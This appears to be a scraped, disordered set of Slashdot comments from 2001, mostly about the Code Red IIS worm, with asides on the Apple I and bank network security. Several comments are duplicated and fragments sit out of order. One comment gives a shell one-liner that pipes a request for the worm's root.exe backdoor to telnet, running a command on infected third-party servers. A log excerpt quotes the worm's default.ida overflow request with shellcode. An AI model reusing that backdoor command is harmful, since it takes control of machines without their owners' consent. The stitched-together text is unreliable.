It basicly looks for Vulnerable servers so that network admins can track them down and get the web admins to patch the machines before they get infected.
Nice to see someone has come up with a clean, pro-active method to kill this little menace off.
I saw that Reuters story earlier
on
Code Red III
·
· Score: 4, Interesting
but I have not seen any instances of attempted infection.
It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.
I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.
I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.
You can find the results and a link to the script here
Error in CGI Application
CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).
Only a handful (yes, a handful) of Apple I's were ever made.
All of them had a motherboard made out of balsa - (yes balsawood!).
$25,000 - that is a very low price, considering the rarity of the object.
It would take Steve Wozinak twenty five seconds to sign all the produced models of the Apple I, so the fact that it was signed is pretty much neither here nor there.
Just a point to make about the O'reilly book that was mentioned to be out of print.
It may be out of print but it isn't offline.
And it's not PDF either:0
When employees start posting their CVs and Resumes (1, 2, 3)on company sites run by their employers then either the site has to go or the employees have to go... or both.
yeah right - "because our Win2k IIS server seemed to get DDos even after we posted our recommendations on securing Win2k against it we are migrating to Linux... we expect to have completed this the week after next"
Necessary data connections between the netwoks are randomly disconnected by a mechanical device. Even developers working in the bank have limited internet access by a slow modem to a secure proxy server (which might make it a crappy job but also a fine place to put your money in).
Randomly? Do they randomly deposit money in their customer accounts as well?
oh come on! I have never heard such clap trap - Do you have a URL, rather than these weird urban legend approaches to network security?
slow modem? They use modems? Banks? I just can't believe it. I seen the Network installations of many financial institutions and there were very few modems - plenty of Switches, Firewalls and Routers though.
I'd be surprised if they're using hubs at all. Switches are better, they could implement VLANs to separate their mission critical networks from their "office" networks.
Your description is really scary - I hope your power companies have better IT/Network Operations departments...
Slashdot Mirror
Then there is a nice little Vulnerable Server Scanner Provided by the people at www.eeye.com.
It basicly looks for Vulnerable servers so that network admins can track them down and get the web admins to patch the machines before they get infected.
Nice to see someone has come up with a clean, pro-active method to kill this little menace off.
but I have not seen any instances of attempted infection.
It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.
I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.
Never heard of this company.
Data Carrier companys are a pretty boring topic...
Not much money in pushing packets around...
uh huh... I hear ya knocking, but ya can't come in... Apache... ya ya ya.
I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.
You can find the results and a link to the script here
That's really nice!
Here are my logs: here.
Only 34 so far, but I only decided to open up apache to these this afternoon...
Cheers for that!
Very nice advice:
/scripts/root.exe?+/c+start+http://www.digitalisla nd.com/codered/ HTTP/1.0" | telnet $1 80
Here is a oneliner:
Usage popup
#!/bin/sh
echo "GET
Now how do I get it to tail my apache log and automatically run?
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 14:43:22 GMT
Content-Length: 215
Content-Type: text/html
Error in CGI Application
CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Connection closed by foreign host.
root@gate:~# telnet x.x.x.x 80
Trying x.x.x.x...
absolutely - use Multicast Groups as well.
I felt I was missing the fun... so I decided to open up a port on my firewall and check for some attack attempts...
/var/log/apache/access_log came up with:
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281
It took only ten minutes before
213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET
Blimey... 10 minutes! This thing is rife!!!
And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).
I live in the UK, and I have to ask:
"What is a Datsun, sonny?"
Only a handful (yes, a handful) of Apple I's were ever made.
All of them had a motherboard made out of balsa - (yes balsawood!).
$25,000 - that is a very low price, considering the rarity of the object.
It would take Steve Wozinak twenty five seconds to sign all the produced models of the Apple I, so the fact that it was signed is pretty much neither here nor there.
It certainly does depend.
Judging by how trivial you found Apache, Perl, MySQL & PHP setup I can presume that you are hardly a typical computer user.
Just a point to make about the O'reilly book that was mentioned to be out of print. It may be out of print but it isn't offline. And it's not PDF either :0
yep... mod this one down as soon as you can please.
Thank you for proving my point. :-)
Don't forget the Amiga - it's user base actually killed the Amiga off...
Other than that - I really hear you...
The moderator who moderated this is a bit of an idiot.
- Just my opinion -
When employees start posting their CVs and Resumes (1, 2, 3)on company sites run by their employers then either the site has to go or the employees have to go... or both.
yeah right - "because our Win2k IIS server seemed to get DDos even after we posted our recommendations on securing Win2k against it we are migrating to Linux... we expect to have completed this the week after next"
I especially like the bollocks they use:
Colour it Green - call it red...
and so on...
This is bollocks! At it's best.
Hear Hear! Just drop the routes to unnecessery hosts - now that is real security measures - and they work!
Until someone compromises one of those trusted systems...
Necessary data connections between the netwoks are randomly disconnected by a mechanical device. Even developers working in the bank have limited internet access by a slow modem to a secure proxy server (which might make it a crappy job but also a fine place to put your money in).
Randomly? Do they randomly deposit money in their customer accounts as well?
oh come on! I have never heard such clap trap - Do you have a URL, rather than these weird urban legend approaches to network security?
slow modem? They use modems? Banks? I just can't believe it. I seen the Network installations of many financial institutions and there were very few modems - plenty of Switches, Firewalls and Routers though.
We have only a limited number of hubs
Who's "we"?
I'd be surprised if they're using hubs at all. Switches are better, they could implement VLANs to separate their mission critical networks from their "office" networks.
Your description is really scary - I hope your power companies have better IT/Network Operations departments...
april 1st was 22 days ago matey.